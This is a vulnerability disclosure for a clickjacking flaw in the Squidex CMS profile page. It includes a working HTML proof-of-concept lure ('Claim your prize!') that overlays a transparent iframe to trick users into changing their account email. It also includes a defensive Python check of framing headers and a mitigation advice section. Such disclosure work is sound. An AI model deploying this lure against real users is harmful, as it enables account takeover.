Squidex CMS CSRF

About the Application

Squidex is an open source, headless content management system (CMS) and content management hub providing an API-first platform for managing and delivering content.

About the Finding

A clickjacking weakness consistent with CWE-1021 (Improper Restriction of Rendered UI Layers or Frames) permits framing of the profile management page due to missing or insufficient anti-framing controls.

PoC || GTFO

Create an HTML file with the proof-of-concept content below and upload it into Assets. Access the uploaded file directly to observe the HTML page loading, with an iframe loading the profile management page inside it.

<!doctype html>
<html>
<head>
  <meta charset="utf-8">
  <title>Example layout</title>
  <style>
    iframe {
      position: absolute;
      top: 0; left: 0;
      width: 500px; height: 1000px;
      opacity: 0.10;
      z-index: 2;
      border: none;
    }
    .decoy {
      position: relative;
      width: 500px;
      height: 900px;
      border: 1px dashed #ccc;
    }
    .controls {
      position: absolute;
      left: 55px;
      top: 395px;
    }
    #btn {
      position: absolute;
      padding: 10px 10px;
      font-size: 10px;
      left: -9px;
      top: 178px;
    }
  </style>
</head>
<body>
  <div class="decoy">
    <h1>Claim your prize!</h1>
    <p>For verification purposes, enter organiser's email below and click Verify</p>
    <div class="controls">
      <input type="text" placeholder="Organiser's email">
      <button id="btn">Verify</button>
    </div>
  </div>
  <iframe src="https://squidex.local/identity-server/account/profile"></iframe>
</body>
</html>

YouTube demonstration video: https://www.youtube.com/watch?v=62ay_jrwUcI

Conclusion

Where profile management operations include email address changes without verification, UI redress can induce state changes with durable security consequences, including account integrity compromise and potential account recovery pivot scenarios. Industry guidance identifies CSP frame-ancestors (preferably frame-ancestors 'none' for sensitive UI) and, where applicable, X-Frame-Options as primary mitigations to prevent clickjacking by disallowing framing.
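The following is an added example, not code from the advisory or from Squidex: it evaluates a response's headers the way a browser does when deciding whether a page may be framed (a CSP frame-ancestors directive takes precedence; X-Frame-Options is consulted only when that directive is absent), and checks the two embedders that matter for this finding, an external page and a document served from the application's own origin, as an uploaded asset is. The asset and lure URLs are constructed placeholders; ports and multiple CSP headers are ignored for brevity.

```python
# Added example (not the project's code): would a browser let page_url be framed
# by a document at embedder_url, given the page's response headers?
from fnmatch import fnmatchcase
from urllib.parse import urlsplit

def _origin(url):
    u = urlsplit(url)
    return (u.scheme.lower(), u.hostname or "")

def _frame_ancestors(csp):
    """Source list of the frame-ancestors directive, or None if not present."""
    for directive in csp.split(";"):
        tokens = directive.split()
        if tokens and tokens[0].lower() == "frame-ancestors":
            return [t.lower() for t in tokens[1:]]
    return None

def _source_matches(src, page, embedder):
    if src == "'none'":
        return False
    if src == "'self'":
        return embedder == page
    if src == "*":
        return True
    if src.endswith(":") and "://" not in src:   # scheme-source such as https:
        return embedder[0] == src[:-1]
    scheme, _, host = src.partition("://")
    if not host:                                 # bare host inherits the page's scheme
        scheme, host = page[0], scheme
    return embedder[0] == scheme and fnmatchcase(embedder[1], host.split("/")[0])

def may_be_framed(headers, page_url, embedder_url):
    """True if page_url could be rendered inside a frame on embedder_url."""
    h = {k.lower(): v for k, v in headers.items()}
    page, embedder = _origin(page_url), _origin(embedder_url)
    sources = _frame_ancestors(h.get("content-security-policy", ""))
    if sources is not None:                      # CSP wins over X-Frame-Options
        return any(_source_matches(s, page, embedder) for s in sources)
    xfo = h.get("x-frame-options", "").strip().upper()
    if xfo == "DENY":
        return False
    if xfo == "SAMEORIGIN":
        return embedder == page
    return True                                  # no anti-framing control at all

def check_profile_page(headers):
    """The two embedders from the finding: an external lure and a same-origin asset (constructed URLs)."""
    page = "https://squidex.local/identity-server/account/profile"
    return {"external": may_be_framed(headers, page, "https://attacker.example/lure.html"),
            "same_origin": may_be_framed(headers, page, "https://squidex.local/poc.html")}
```

Note that `frame-ancestors 'self'` or `X-Frame-Options: SAMEORIGIN` still reports the same-origin case as frameable, which is why the conclusion prefers `frame-ancestors 'none'` for this page.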
